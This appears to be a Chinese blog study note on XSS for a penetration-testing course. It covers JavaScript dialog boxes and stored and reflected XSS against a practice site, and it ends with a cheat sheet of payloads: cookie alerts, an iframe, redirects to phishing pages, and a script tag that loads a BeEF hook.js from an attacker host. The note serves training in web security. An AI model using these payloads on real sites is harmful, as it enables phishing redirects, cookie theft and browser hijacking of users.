PTE_XSS(Day2)

JS消息框分为以下三种:

alert("文本")

confirm("文本")

<script>var r=confirm("你选择了什么");if(r==true){alert('你选择了确认');}else{alert('你选择了取消');}</script>

 

 

 prompt("文本","默认值")

 XSS存储型注入

 这里发现单引号被过滤了,所以用 / 或者双引号代替单引号

重定向

 <script>window.location="http://121.5.23.168"</script>

跳转成功

反射型XSS攻击

构造payload

http://d9fd2486.yunyansec.com/src/xss_1.php?key=%3Cscript%3Ewindow.location%3D%22http%3A%2F%2F121.5.23.168%2F%22%3C%2Fscript%3E#

别人点击以后会进入新的地址

原:

构造以后:

 原理就是诱导用户点击,钓鱼

 

XSS攻击脚本

弹窗警告
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>

页面嵌套
<iframe> src=http://www.baidu.com width=10 height=10 border=10 </iframe>

重定向
<script>window.location="http://www.baidu.com"</script>

弹窗警告并重定向
<script>alert('网站升级更新,请移步新版本');location.href="https://www.baidu.com"</script>

访问恶意代码
<script src="http://BeEF_IP:3000/hook.js"></script>

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值